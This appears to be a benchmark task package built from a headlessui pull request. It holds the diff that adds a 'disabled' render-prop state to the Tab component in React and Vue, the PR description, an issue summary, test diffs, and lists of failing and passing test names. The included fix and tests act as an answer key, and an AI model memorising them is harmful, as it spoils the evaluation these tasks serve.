"test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, 
"test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
b83b5b6ffc66954a87ef9f1a1767b58f496618d8
2024-01-09 14:40:15
vercel[bot]: [vc]: #m5JwGxZRy1nv50m24FNcA4QtovnHyuXS1s/0r9qhD/s=:eyJpc01vbm9yZXBvIjp0cnVlLCJ0eXBlIjoiZ2l0aHViIiwicHJvamVjdHMiOlt7Im5hbWUiOiJoZWFkbGVzc3VpLXJlYWN0Iiwicm9vdERpcmVjdG9yeSI6InBsYXlncm91bmRzL3JlYWN0IiwiaW5zcGVjdG9yVXJsIjoiaHR0cHM6Ly92ZXJjZWwuY29tL3RhaWx3aW5kbGFicy9oZWFkbGVzc3VpLXJlYWN0LzNQZ2o1R0tzWVphUlY3d1pydm9iZUZwRTdXVloiLCJwcmV2aWV3VXJsIjoiaGVhZGxlc3N1aS1yZWFjdC1naXQtZml4LWlzc3VlLTI4NjQtdGFpbHdpbmRsYWJzLnZlcmNlbC5hcHAiLCJuZXh0Q29tbWl0U3RhdHVzIjoiUEVORElORyIsImxpdmVGZWVkYmFjayI6eyJyZXNvbHZlZCI6MCwidW5yZXNvbHZlZCI6MCwidG90YWwiOjAsImxpbmsiOiJoZWFkbGVzc3VpLXJlYWN0LWdpdC1maXgtaXNzdWUtMjg2NC10YWlsd2luZGxhYnMudmVyY2VsLmFwcCJ9fSx7Im5hbWUiOiJoZWFkbGVzc3VpLXZ1ZSIsInJvb3REaXJlY3RvcnkiOiJwbGF5Z3JvdW5kcy92dWUiLCJpbnNwZWN0b3JVcmwiOiJodHRwczovL3ZlcmNlbC5jb20vdGFpbHdpbmRsYWJzL2hlYWRsZXNzdWktdnVlLzRBUHBuRVhnVTZtV2tvZW1QYWRyU0NZcENtMlAiLCJwcmV2aWV3VXJsIjoiaGVhZGxlc3N1aS12dWUtZ2l0LWZpeC1pc3N1ZS0yODY0LXRhaWx3aW5kbGFicy52ZXJjZWwuYXBwIiwibmV4dENvbW1pdFN0YXR1cyI6IlBFTkRJTkciLCJsaXZlRmVlZGJhY2siOnsicmVzb2x2ZWQiOjAsInVucmVzb2x2ZWQiOjAsInRvdGFsIjowLCJsaW5rIjoiaGVhZGxlc3N1aS12dWUtZ2l0LWZpeC1pc3N1ZS0yODY0LXRhaWx3aW5kbGFicy52ZXJjZWwuYXBwIn19XX0= **The latest updates on your projects**. 
Learn more about [Vercel for Git ↗︎](https://vercel.link/github-learn-more) | Name | Status | Preview | Comments | Updated (UTC) | | :--- | :----- | :------ | :------- | :------ | | **headlessui-react** | 🔄 Building ([Inspect](https://vercel.com/tailwindlabs/headlessui-react/3Pgj5GKsYZaRV7wZrvobeFpE7WVZ)) | [Visit Preview](https://vercel.live/open-feedback/headlessui-react-git-fix-issue-2864-tailwindlabs.vercel.app?via=pr-comment-visit-preview-link&passThrough=1) | 💬 [**Add feedback**](https://vercel.live/open-feedback/headlessui-react-git-fix-issue-2864-tailwindlabs.vercel.app?via=pr-comment-feedback-link) | Jan 9, 2024 2:40pm | | **headlessui-vue** | 🔄 Building ([Inspect](https://vercel.com/tailwindlabs/headlessui-vue/4APpnEXgU6mWkoemPadrSCYpCm2P)) | [Visit Preview](https://vercel.live/open-feedback/headlessui-vue-git-fix-issue-2864-tailwindlabs.vercel.app?via=pr-comment-visit-preview-link&passThrough=1) | 💬 [**Add feedback**](https://vercel.live/open-feedback/headlessui-vue-git-fix-issue-2864-tailwindlabs.vercel.app?via=pr-comment-feedback-link) | Jan 9, 2024 2:40pm |
tailwindlabs__headlessui-2918
diff --git a/packages/@headlessui-react/CHANGELOG.md b/packages/@headlessui-react/CHANGELOG.md index faa061e..1b7359e 100644 --- a/packages/@headlessui-react/CHANGELOG.md +++ b/packages/@headlessui-react/CHANGELOG.md @@ -7,7 +7,9 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0 ## [Unreleased] -- Nothing yet! +### Fixed + +- Expose `disabled` state on `<Tab />` component ([#2918](https://github.com/tailwindlabs/headlessui/pull/2918)) ## [2.0.0-alpha.4] - 2024-01-03 diff --git a/packages/@headlessui-react/src/components/tabs/tabs.tsx b/packages/@headlessui-react/src/components/tabs/tabs.tsx index 24ea498..e4de17f 100644 --- a/packages/@headlessui-react/src/components/tabs/tabs.tsx +++ b/packages/@headlessui-react/src/components/tabs/tabs.tsx @@ -388,6 +388,7 @@ type TabRenderPropArg = { active: boolean autofocus: boolean selected: boolean + disabled: boolean } type TabPropsWeControl = 'aria-controls' | 'aria-selected' | 'role' | 'tabIndex' @@ -512,8 +513,9 @@ function TabFn<TTag extends ElementType = typeof DEFAULT_TAB_TAG>( active, focus, autofocus: props.autoFocus ?? false, + disabled: props.disabled ?? 
false, }) satisfies TabRenderPropArg, - [selected, hover, focus, active, props.autoFocus] + [selected, hover, focus, active, props.autoFocus, props.disabled] ) let ourProps = mergeProps( diff --git a/packages/@headlessui-vue/CHANGELOG.md b/packages/@headlessui-vue/CHANGELOG.md index a372c35..5ac8cff 100644 --- a/packages/@headlessui-vue/CHANGELOG.md +++ b/packages/@headlessui-vue/CHANGELOG.md @@ -12,6 +12,10 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0 - Add `immediate` prop to `<Combobox />` for immediately opening the Combobox when the `input` receives focus ([#2686](https://github.com/tailwindlabs/headlessui/pull/2686)) - Add `virtual` prop to `Combobox` component ([#2779](https://github.com/tailwindlabs/headlessui/pull/2779)) +### Fixed + +- Expose `disabled` state on `<Tab />` component ([#2918](https://github.com/tailwindlabs/headlessui/pull/2918)) + ## [1.7.17] - 2024-01-08 ### Fixed diff --git a/packages/@headlessui-vue/src/components/tabs/tabs.ts b/packages/@headlessui-vue/src/components/tabs/tabs.ts index 4e5156e..591c92c 100644 --- a/packages/@headlessui-vue/src/components/tabs/tabs.ts +++ b/packages/@headlessui-vue/src/components/tabs/tabs.ts @@ -423,7 +423,7 @@ export let Tab = defineComponent({ ) return () => { - let slot = { selected: selected.value } + let slot = { selected: selected.value, disabled: props.disabled ?? false } let { id, ...theirProps } = props let ourProps = { ref: internalTabRef,
Expose `disabled` state on `<Tab />` component This PR fixes an issue where `disabled` on the `<Tab/>` component wasn't exposed. This will expose it such that you can use it with `ui-disabled`. In the Alpha version of React, you can also use `data-[disabled]` because it will be exposed as `data-disabled` over there as well. Marked it as fixed because we already accept the `disabled` state and expose it in some other components so considered it "missing". Fixes: #2864
**Title** Expose the `disabled` state on the `<Tab />` component **Problem** The `<Tab />` component never surfaced its `disabled` prop, so utilities like `ui-disabled` or data attributes could not react to a disabled tab. This caused inconsistencies compared to other components that already expose this state. **Root Cause** The component’s render contract omitted the `disabled` flag, so it was never passed through to the consumer‑visible props. **Fix / Expected Behavior** - The `disabled` flag is now part of the render payload for `<Tab />`. - Consumers can style or query a disabled tab via Tailwind UI utilities or `data-[disabled]`. - The default value remains `false` when the prop is not supplied. - The change is reflected in both React and Vue implementations. - Documentation and changelog entries are updated to note the fix. **Risk & Validation** - Verify that existing tabs without a `disabled` prop continue to behave unchanged. - Add tests or visual checks confirming that a disabled tab receives the expected attributes and styling. - Ensure that the new render payload does not break type expectations for downstream consumers.
2,918
tailwindlabs/headlessui
diff --git a/packages/@headlessui-react/src/components/tabs/tabs.test.tsx b/packages/@headlessui-react/src/components/tabs/tabs.test.tsx index 679a4cb..9cb78f2 100644 --- a/packages/@headlessui-react/src/components/tabs/tabs.test.tsx +++ b/packages/@headlessui-react/src/components/tabs/tabs.test.tsx @@ -544,6 +544,7 @@ describe('Rendering', () => { active: false, focus: false, autofocus: false, + disabled: false, }) ) expect(document.querySelector('[data-tab="1"]')).toHaveTextContent( @@ -553,6 +554,7 @@ describe('Rendering', () => { active: false, focus: false, autofocus: false, + disabled: false, }) ) expect(document.querySelector('[data-tab="2"]')).toHaveTextContent( @@ -562,6 +564,7 @@ describe('Rendering', () => { active: false, focus: false, autofocus: false, + disabled: false, }) ) @@ -574,6 +577,7 @@ describe('Rendering', () => { active: false, focus: false, autofocus: false, + disabled: false, }) ) expect(document.querySelector('[data-tab="1"]')).toHaveTextContent( @@ -583,6 +587,7 @@ describe('Rendering', () => { active: false, focus: false, autofocus: false, + disabled: false, }) ) expect(document.querySelector('[data-tab="2"]')).toHaveTextContent( @@ -592,6 +597,7 @@ describe('Rendering', () => { active: false, focus: false, autofocus: false, + disabled: false, }) ) }) diff --git a/packages/@headlessui-vue/src/components/tabs/tabs.test.ts b/packages/@headlessui-vue/src/components/tabs/tabs.test.ts index 96a152e..28a5896 100644 --- a/packages/@headlessui-vue/src/components/tabs/tabs.test.ts +++ b/packages/@headlessui-vue/src/components/tabs/tabs.test.ts @@ -463,25 +463,25 @@ describe('Rendering', () => { await new Promise<void>(nextTick) expect(document.querySelector('[data-tab="0"]')).toHaveTextContent( - JSON.stringify({ selected: true }) + JSON.stringify({ selected: true, disabled: false }) ) expect(document.querySelector('[data-tab="1"]')).toHaveTextContent( - JSON.stringify({ selected: false }) + JSON.stringify({ selected: false, disabled: false }) 
) expect(document.querySelector('[data-tab="2"]')).toHaveTextContent( - JSON.stringify({ selected: false }) + JSON.stringify({ selected: false, disabled: false }) ) await click(getTabs()[1]) expect(document.querySelector('[data-tab="0"]')).toHaveTextContent( - JSON.stringify({ selected: false }) + JSON.stringify({ selected: false, disabled: false }) ) expect(document.querySelector('[data-tab="1"]')).toHaveTextContent( - JSON.stringify({ selected: true }) + JSON.stringify({ selected: true, disabled: false }) ) expect(document.querySelector('[data-tab="2"]')).toHaveTextContent( - JSON.stringify({ selected: false }) + JSON.stringify({ selected: false, disabled: false }) ) })
[ "should keep the delay time into account", "should expose the `selected` state on the `Tab` components", "should transition in completely (duration defined in milliseconds)", "should fire events for all the stages" ]
[ "should be possible to get the text value from an element", "should strip out emojis when receiving the text from the element", "should strip out hidden elements", "should strip out aria-hidden elements", "should strip out role=\"img\" elements", "should be possible to get the text value from the aria-label", "should be possible to get the text value from the aria-label (even if there is content)", "should be possible to get the text value from the element referenced by aria-labelledby (using `aria-label`)", "should be possible to get the text value from the element referenced by aria-labelledby (using its contents)", "should be possible to get the text value from the element referenced by aria-labelledby (using `aria-label`, multiple)", "should be possible to get the text value from the element referenced by aria-labelledby (using its contents, multiple)", "should be possible to server side render the Disclosure in a closed state", "should be possible to server side render the Disclosure in an open state", "should expose focus data attributes on the element", "should expose hover data attributes on the element", "should render a button", "should default to `type=\"button\"`", "should render a button using a render prop", "should map the `autoFocus` prop to a `data-autofocus` attribute", "should be possible to use useDescriptions without using a Description", "should be possible to use useDescriptions and a single Description, and have them linked", "should be possible to use useDescriptions and multiple Description components, and have them linked", "should be possible to update a prop from the parent and it should reflect in the Description component", "A transition without appear=true does not insert classes during SSR", "should not overwrite className of children when as=Fragment", "should be possible to use a LabelProvider without using a Label", "should be possible to use a LabelProvider and a single Label, and have them linked", "should be possible to use 
a LabelProvider and multiple Label components, and have them linked", "should expose the correct components", "should fire the correct events 0", "should fire the correct events 1", "should fire the correct events 2", "should fire the correct events 3", "should fire the correct events 4", "should fire the correct events 5", "should fire the correct events 6", "should fire the correct events 7", "should fire the correct events 8", "should fire the correct events 9", "should fire the correct events 10", "should fire the correct events 11", "should fire the correct events 12", "should fire the correct events 13", "should fire the correct events 14", "should fire the correct events 15", "should fire the correct events 16", "should fire the correct events 17", "should fire the correct events 18", "should fire the correct events 19", "should fire the correct events 20", "should fire the correct events 21", "should be possible to use useLabels without using a Label", "should be possible to use useLabels and a single Label, and have them linked", "should be possible to use useLabels and multiple Label components, and have them linked", "should be possible to update a prop from the parent and it should reflect in the Label component", "should be possible to transition", "should be possible to cancel a transition at any time", "should be possible to use a DescriptionProvider without using a Description", "should be possible to use a DescriptionProvider and a single Description, and have them linked", "should be possible to use a DescriptionProvider and multiple Description components, and have them linked", "should be possible to inert an element", "should not mark an element as inert when the hook is disabled", "should mark the element as not inert anymore, once all references are gone", "should be possible to use a Portal", "should be possible to use multiple Portal elements", "should cleanup the Portal root when the last Portal is unmounted", "should be possible to render 
multiple portals at the same time", "should be possible to tamper with the modal root and restore correctly", "should be possible to force the Portal into a specific element using Portal.Group", "should render a `Field` component", "should add `aria-disabled` when a `Field` is disabled", "should inherit the `disabled` state from a parent `Fieldset`", "should be possible to render a dummy component", "should be possible to merge classes when rendering", "should be possible to merge class fns when rendering", "should be possible to render a dummy component with some children as a callback", "should be possible to add a ref with a different name", "should be possible to passthrough props to a dummy component", "should be possible to change the underlying DOM node using the `as` prop", "should be possible to change the underlying DOM node using the `as` prop and still have a function as children", "should be possible to render the children only when the `as` prop is set to Fragment", "should forward all the props to the first child when using an as={Fragment}", "should error when we are rendering a Fragment with multiple children", "should not error when we are rendering a Fragment with multiple children when we don't passthrough additional props", "should error when we are applying props to a Fragment when we do not have a dedicated element", "should be possible to render a `static` dummy component (show = true)", "should be possible to render a `static` dummy component (show = false)", "should be possible to render an `unmount` dummy component (show = true)", "should be possible to render an `unmount` dummy component (show = false)", "should be possible to render an `unmount={false}` dummy component (show = true)", "should be possible to render an `unmount={false}` dummy component (show = false)", "should result in a typescript error", "should encode an input of {\"a\":\"b\"} to an form data output", "should encode an input of [1,2,3] to an form data output", "should 
encode an input of {\"id\":1,\"admin\":true,\"name\":{\"first\":\"Jane\",\"last\":\"Doe\",\"nickname\":{\"preferred\":\"JDoe\"}}} to an form data output", "should be possible to server side render the first Tab and Panel", "should be possible to server side render the defaultIndex Tab and Panel", "should be possible to server side render the selectedIndex=0 Tab and Panel", "should be possible to server side render the selectedIndex=1 Tab and Panel", "should focus the first focusable element inside the FocusTrap", "should focus the autoFocus element inside the FocusTrap if that exists", "should focus the initialFocus element inside the FocusTrap if that exists", "should focus the initialFocus element inside the FocusTrap even if another element has autoFocus", "should warn when there is no focusable element inside the FocusTrap", "should restore the previously focused element, before entering the FocusTrap, after the FocusTrap unmounts", "should stay in the FocusTrap when using `tab`, if there is only 1 focusable element", "should stay in the FocusTrap when using `shift+tab`, if there is only 1 focusable element", "should be possible tab to the next focusable element within the focus trap", "should be possible shift+tab to the previous focusable element within the focus trap", "should skip the initial \"hidden\" elements within the focus trap", "should be possible skip \"hidden\" elements within the focus trap", "should be possible skip disabled elements within the focus trap", "should not be possible to escape the FocusTrap due to strange tabIndex usage", "SSR-rendering a Portal should not error", "should be possible to force the Portal into a specific element using PortalGroup", "should error when we are using a <DisclosureButton /> without a parent <Disclosure />", "should error when we are using a <DisclosurePanel /> without a parent <Disclosure />", "should be possible to render a Disclosure without crashing", "should be possible to render a Disclosure using a 
render prop", "should be possible to render a Disclosure in an open state by default", "should expose a close function that closes the disclosure", "should expose a close function that closes the disclosure and restores to a specific element", "should expose a close function that closes the disclosure and restores to a ref", "should be possible to render a DisclosureButton using a render prop", "should be possible to render a DisclosureButton using a render prop and an `as` prop", "should set the `type` to \"button\" by default", "should not set the `type` to \"button\" if it already contains a `type`", "should set the `type` to \"button\" when using the `as` prop which resolves to a \"button\"", "should not set the type if the \"as\" prop is not a \"button\"", "should not set the `type` to \"button\" when using the `as` prop which resolves to a \"div\"", "should be possible to render DisclosurePanel using a render prop", "should be possible to always render the DisclosurePanel if we provide it a `static` prop", "should be possible to use a different render strategy for the DisclosurePanel", "should always open the DisclosurePanel because of a wrapping OpenClosed component", "should always close the DisclosurePanel because of a wrapping OpenClosed component", "should be possible to read the OpenClosed state", "should be possible to open the Disclosure with Enter", "should not be possible to open the disclosure with Enter when the button is disabled", "should be possible to close the disclosure with Enter when the disclosure is open", "should be possible to open the disclosure with Space", "should not be possible to open the disclosure with Space when the button is disabled", "should be possible to close the disclosure with Space when the disclosure is open", "should be possible to open a disclosure on click", "should not be possible to open a disclosure on right click", "should not be possible to open a disclosure on click when the button is disabled", "should be 
possible to close a disclosure on click", "should be possible to close the Disclosure by clicking on a DisclosureButton inside a DisclosurePanel", "should render a `Fieldset` component", "should add an `aria-disabled` attribute when disabling the `Fieldset`", "should link a `Fieldset` to a nested `Legend`", "should not link a `Label` inside a `Field` to the `Fieldset`", "should error when using an as=\"template\" with additional props", "should forward the props to the first child", "should forward the props via Functional Components", "should allow use of <slot> as children", "as=element", "as=template", "should render a control", "should have an `id` attached", "should be possible to override the `id`", "should mark the control as disabled, if the `Field` is disabled", "should link a control and a `Label` when inside a `Field`", "should link a control and multiple `Label` components when inside a `Field`", "should link a control and a `Description` when inside a `Field`", "should link a control and multiple `Description` components when inside a `Field`", "should link a control with a `Label` and a `Description` when inside a `Field`", "should be possible to click a `Label`, and focus the control when in a `Field`", "should not be possible to click a `Label`, if the `Label` has the `passive` prop", "should not be possible to click a `Label` and focus the control, if the control is disabled", "should not be possible to click a `Label` and focus the control, if the `Field` is disabled", "should not be possible to click a `Label` and focus the control, if the `Fieldset` is disabled", "should render native (hidden) form elements for the control", "should submit the form with all the data", "should reset the control when the form is reset", "should not be possible to programmatically escape the focus trap", "should be possible to tab to the next focusable element within the focus trap", "should be possible to shift+tab to the previous focusable element within the 
focus trap", "should be possible to put the checkbox in an indeterminate state", "should be possible to put the checkbox in an default checked state", "should render a checkbox in an unchecked state", "should be possible to toggle a checkbox", "should be possible to toggle a checkbox by clicking it", "should error when we are using a <Disclosure.Button /> without a parent <Disclosure />", "should error when we are using a <Disclosure.Panel /> without a parent <Disclosure />", "should not crash when using Suspense boundaries", "should be possible to render a Disclosure.Button using a render prop", "should be possible to render a Disclosure.Button using a render prop and an `as` prop", "should be possible to render Disclosure.Panel using a render prop", "should be possible to always render the Disclosure.Panel if we provide it a `static` prop", "should be possible to use a different render strategy for the Disclosure.Panel", "should be possible to control the Disclosure.Panel by wrapping it in a Transition component", "should be possible to close the Disclosure by clicking on a Disclosure.Button inside a Disclosure.Panel", "should generate css for an exposed state", "should generate the inverse \"not\" css for an exposed state", "should generate the ui-focus-visible variant", "should generate the ui-not-focus-visible variant", "should error when we are using a <RadioGroupOption /> without a parent <RadioGroup />", "should be possible to render a RadioGroup without crashing", "should be possible to render a RadioGroup without options and without crashing", "should be possible to render a RadioGroup, where the first element is tabbable (value is undefined)", "should be possible to render a RadioGroup, where the first element is tabbable (value is null)", "should be possible to render a RadioGroup with an active value", "should guarantee the radio option order after a few unmounts", "should be possible to render a RadioGroupOption with a render prop", "should set the 
checked v-slot info to true for the selected item (testing with objects, because Vue proxies)", "should be possible to put classes on a RadioGroup", "should be possible to put classes on a RadioGroupOption", "should be possible to disable a RadioGroup", "should be possible to disable a RadioGroup.Option", "should guarantee the order of DOM nodes when performing actions", "should be possible to use a custom component using the `as` prop without crashing", "should use object equality by default", "should be possible to compare null values by a field", "should be possible to compare objects by a field", "should be possible to compare objects by a comparator function", "should be possible to use in an uncontrolled way", "should be possible to provide a default value", "should be possible to reset to the default value if the form is reset", "should be possible to reset to the default value if the form is reset (using objects)", "should still call the onChange listeners when choosing new values", "should be possible to tab to the first item", "should not change the selected element on focus", "should be possible to tab to the active item", "should not change the selected element on focus (when selecting the active item)", "should be possible to tab out of the radio group (no selected value)", "should be possible to tab out of the radio group (selected value)", "should go to the previous item when pressing the ArrowLeft key", "should go to the previous item when pressing the ArrowUp key", "should go to the next item when pressing the ArrowRight key", "should go to the next item when pressing the ArrowDown key", "should select the current option when pressing space", "should select the current option only once when pressing space", "should submit the form on `Enter`", "should submit the form on `Enter` (when no submit button was found)", "should be possible to change the current radio group value when clicking on a radio option", "should be a no-op when clicking on the 
same item", "should be possible to set the `form`, which is forwarded to the hidden inputs", "should be possible to submit a form with a value", "should be possible to submit a form with a complex value object", "should be possible to render a Switch without crashing", "should be possible to render an (on) Switch using a render prop", "should be possible to render an (off) Switch using a render prop", "should be possible to render an (on) Switch using an `as` prop", "should be possible to render an (off) Switch using an `as` prop", "should be possible to use the switch contents as the label", "should be possible to use in an uncontrolled way with a value", "should be possible to render a Switch.Group, Switch and Switch.Label", "should be possible to render a Switch.Group, Switch and Switch.Label (before the Switch)", "should be possible to render a Switch.Group, Switch and Switch.Label (after the Switch)", "should be possible to render a Switch.Group, Switch and Switch.Description (before the Switch)", "should be possible to render a Switch.Group, Switch and Switch.Description (after the Switch)", "should be possible to render a Switch.Group, Switch, Switch.Label and Switch.Description", "should be possible to toggle the Switch with Space", "should not be possible to use Enter to toggle the Switch", "should be possible to tab away from the Switch", "should be possible to toggle the Switch with a click", "should be possible to toggle the Switch with a click on the Label", "should not be possible to toggle the Switch with a click on the Label (passive)", "should be possible to submit a form with an boolean value", "should be possible to submit a form with a provided string value", "should be possible to render a SwitchGroup, Switch and SwitchLabel", "should be possible to render a SwitchGroup, Switch and SwitchLabel (before the Switch)", "should be possible to render a SwitchGroup, Switch and SwitchLabel (after the Switch)", "should be possible to put classes on a 
SwitchLabel", "should be possible to put classes on a SwitchDescription", "should be possible to put classes on a SwitchGroup", "should error when we are using a <RadioGroup.Option /> without a parent <RadioGroup />", "should expose internal data as a render prop", "should error when we are using a <MenuButton /> without a parent <Menu />", "should error when we are using a <MenuItems /> without a parent <Menu />", "should error when we are using a <MenuItem /> without a parent <Menu />", "should be possible to render a Menu without crashing", "should not crash when rendering no children at all", "should be possible to render a Menu using a default render prop", "should be possible to render a Menu using a template `as` prop", "should yell when we render a Menu using a template `as` prop (default) that contains multiple children (if we passthrough props)", "should be possible to manually close the Menu using the exposed close function", "should be possible to render a MenuButton using a default render prop", "should be possible to render a MenuButton using a template `as` prop", "should be possible to render a MenuButton using a template `as` prop and a custom element", "should yell when we render a MenuButton using a template `as` prop that contains multiple children", "should be possible to render MenuItems using a default render prop", "should be possible to render MenuItems using a template `as` prop", "should yell when we render MenuItems using a template `as` prop that contains multiple children", "should be possible to always render the MenuItems if we provide it a `static` prop", "should be possible to use a different render strategy for the MenuItems", "should be possible to render MenuItem using a default render prop", "should be possible to render a MenuItem using a template `as` prop", "should yell when we render a MenuItem using a template `as` prop that contains multiple children", "should be possible to swap the menu item with a button for example", 
"should mark all the elements between Menu.Items and Menu.Item with role none", "should always open the MenuItems because of a wrapping OpenClosed component", "should always close the MenuItems because of a wrapping OpenClosed component", "should be possible to render a TransitionChild that inherits state from the Menu", "should be possible to use a button as a menu item and invoke it upon Enter", "should be possible to open the menu with Enter", "should not be possible to open the menu with Enter when the button is disabled", "should have no active menu item when there are no menu items at all", "should focus the first non disabled menu item when opening with Enter", "should focus the first non disabled menu item when opening with Enter (jump over multiple disabled ones)", "should have no active menu item upon Enter key press, when there are no non-disabled menu items", "should be possible to close the menu with Enter when there is no active menuitem", "should be possible to close the menu with Enter and invoke the active menu item", "should be possible to open the menu with Space", "should not be possible to open the menu with Space when the button is disabled", "should focus the first non disabled menu item when opening with Space", "should focus the first non disabled menu item when opening with Space (jump over multiple disabled ones)", "should have no active menu item upon Space key press, when there are no non-disabled menu items", "should be possible to close the menu with Space when there is no active menuitem", "should be possible to close the menu with Space and invoke the active menu item", "should be possible to close an open menu with Escape", "should not focus trap when we use Tab", "should not focus trap when we use Shift+Tab", "should be possible to open the menu with ArrowDown", "should not be possible to open the menu with ArrowDown when the button is disabled", "should be possible to use ArrowDown to navigate the menu items", "should be possible 
to use ArrowDown to navigate the menu items and skip the first disabled one", "should be possible to use ArrowDown to navigate the menu items and jump to the first non-disabled one", "should be possible to open the menu with ArrowUp and the last item should be active", "should be possible to use ArrowUp to navigate the menu items and jump to the first non-disabled one", "should not be possible to navigate up or down if there is only a single non-disabled item", "should be possible to use ArrowUp to navigate the menu items", "should be possible to use the End key to go to the last menu item", "should be possible to use the End key to go to the last non disabled menu item", "should be possible to use the End key to go to the first menu item if that is the only non-disabled menu item", "should have no active menu item upon End key press, when there are no non-disabled menu items", "should be possible to use the PageDown key to go to the last menu item", "should be possible to use the PageDown key to go to the last non disabled menu item", "should be possible to use the PageDown key to go to the first menu item if that is the only non-disabled menu item", "should have no active menu item upon PageDown key press, when there are no non-disabled menu items", "should be possible to use the Home key to go to the first menu item", "should be possible to use the Home key to go to the first non disabled menu item", "should be possible to use the Home key to go to the last menu item if that is the only non-disabled menu item", "should have no active menu item upon Home key press, when there are no non-disabled menu items", "should be possible to use the PageUp key to go to the first menu item", "should be possible to use the PageUp key to go to the first non disabled menu item", "should be possible to use the PageUp key to go to the last menu item if that is the only non-disabled menu item", "should have no active menu item upon PageUp key press, when there are no non-disabled 
menu items", "should be possible to type a full word that has a perfect match", "should be possible to type a partial of a word", "should be possible to type words with spaces", "should not be possible to search for a disabled item", "should be possible to search for a word (case insensitive)", "should be possible to search for the next occurence", "should stay on the same item while keystrokes still match", "should be possible to open a menu on click", "should not be possible to open a menu on right click", "should not be possible to open a menu on click when the button is disabled", "should be possible to close a menu on click", "should be a no-op when we click outside of a closed menu", "should be possible to click outside of the menu which should close the menu", "should be possible to click outside of the menu which should close the menu (even if we press the menu button)", "should be possible to click outside of the menu on another menu button which should close the current menu and open the new menu", "should be possible to hover an item and make it active", "should make a menu item active when you move the mouse over it", "should be a no-op when we move the mouse and the menu item is already active", "should be a no-op when we move the mouse and the menu item is disabled", "should not be possible to hover an item that is disabled", "should be possible to mouse leave an item and make it inactive", "should be possible to mouse leave a disabled item and be a no-op", "should be possible to click a menu item, which closes the menu", "should be possible to click a menu item, which closes the menu and invokes the @click handler", "should be possible to click a disabled menu item, which is a no-op", "should be possible focus a menu item, so that it becomes active", "should not be possible to focus a menu item which is disabled", "should not be possible to activate a disabled item", "should error when we are using a <PopoverButton /> without a parent <Popover />", 
"should error when we are using a <PopoverPanel /> without a parent <Popover />", "should error when we are using a <PopoverOverlay /> without a parent <Popover />", "should be possible to render a Popover without crashing", "should be possible to render a PopoverGroup with multiple Popover components", "should be possible to render a Popover using a render prop", "should expose a close function that closes the popover", "should expose a close function that closes the popover and restores to a specific element", "should expose a close function that closes the popover and restores to a ref", "should be possible to render a PopoverButton using a render prop", "should be possible to render a PopoverButton using a render prop and an `as` prop", "should be possible to render PopoverPanel using a render prop", "should be possible to always render the PopoverPanel if we provide it a `static` prop", "should be possible to use a different render strategy for the PopoverPanel", "should be possible to move the focus inside the panel to the first focusable element (very first link)", "should close the Popover, when PopoverPanel has the focus prop and you focus the open button", "should be possible to move the focus inside the panel to the first focusable element (skip hidden link)", "should be possible to move the focus inside the panel to the first focusable element (very first link) when the hidden render strategy is used", "should always open the PopoverPanel because of a wrapping OpenClosed component", "should always close the PopoverPanel because of a wrapping OpenClosed component", "should be possible to open the Popover with Enter", "should not be possible to open the popover with Enter when the button is disabled", "should be possible to close the popover with Enter when the popover is open", "should close other popover menus when we open a new one", "should close the Popover by pressing `Enter` on a PopoverButton inside a PopoverPanel", "should close the Popover menu, 
when pressing escape on the PopoverButton", "should close the Popover menu, when pressing escape on the PopoverPanel", "should be possible to close a sibling Popover when pressing escape on a sibling PopoverButton", "should be possible to Tab through the panel contents onto the next PopoverButton", "should be possible to place a focusable item in the PopoverGroup, and keep the Popover open when we focus the focusable element", "should close the Popover menu once we Tab out of the PopoverGroup", "should close the Popover menu once we Tab out of the Popover", "should close the Popover menu once we Tab out of a Popover without focusable elements", "should close the Popover when the PopoverPanel has a focus prop", "should close the Popover when the PopoverPanel has a focus prop (PopoverPanel uses a Portal)", "should close the Popover when the PopoverPanel has a focus prop (PopoverPanel uses a Portal), and focus the next focusable item in line", "should focus the previous PopoverButton when Shift+Tab on the second PopoverButton", "should focus the PopoverButton when pressing Shift+Tab when we focus inside the PopoverPanel", "should focus the PopoverButton when pressing Shift+Tab when we focus inside the PopoverPanel (inside a Portal)", "should focus the Popover.Button when pressing Shift+Tab when we focus inside the Popover.Panel (heuristc based portal)", "should be possible to focus the last item in the PopoverPanel when pressing Shift+Tab on the next PopoverButton", "should be possible to focus the last item in the PopoverPanel when pressing Shift+Tab on the next PopoverButton (using Portal's)", "should be possible to open the popover with Space", "should not be possible to open the popover with Space when the button is disabled", "should be possible to close the popover with Space when the popover is open", "should close the Popover by pressing `Space` on a PopoverButton inside a PopoverPanel", "should close the Popover by pressing `Enter` on a PopoverButton and go 
to the href of the `a` inside a PopoverPanel", "should be possible to open a popover on click", "should not be possible to open a popover on right click", "should not be possible to open a popover on click when the button is disabled", "should be possible to close a popover on click", "should be possible to close a Popover using a click on the PopoverOverlay", "should be possible to close the popover, and re-focus the button when we click outside on the body element", "should be possible to close the popover, and re-focus the button when we click outside on a non-focusable element", "should be possible to close the popover, by clicking outside the popover on another focusable element", "should be possible to close the popover, by clicking outside the popover on another element inside a focusable element", "should be possible to close the Popover by clicking on a PopoverButton inside a PopoverPanel", "should not close the Popover when clicking on a focusable element inside a static PopoverPanel", "should not close the Popover when clicking on a non-focusable element inside a static PopoverPanel", "should close the Popover when clicking outside of a static PopoverPanel", "should be possible to close the Popover by clicking on the Popover.Button outside the Popover.Panel", "should be possible to close the Popover by clicking on the Popover.Button outside the Popover.Panel (when using the `focus` prop)", "should not close the Popover if the focus is moved outside of the Popover but still in the same React tree using Portals", "should not close the Popover if the focus is moved outside of the Popover but still in the same React tree using nested Portals", "should be possible to nest Popover components and control them individually", "should error when we are using a <DialogOverlay /> without a parent <Dialog />", "should error when we are using a <DialogTitle /> without a parent <Dialog />", "should error when we are using a <DialogBackdrop 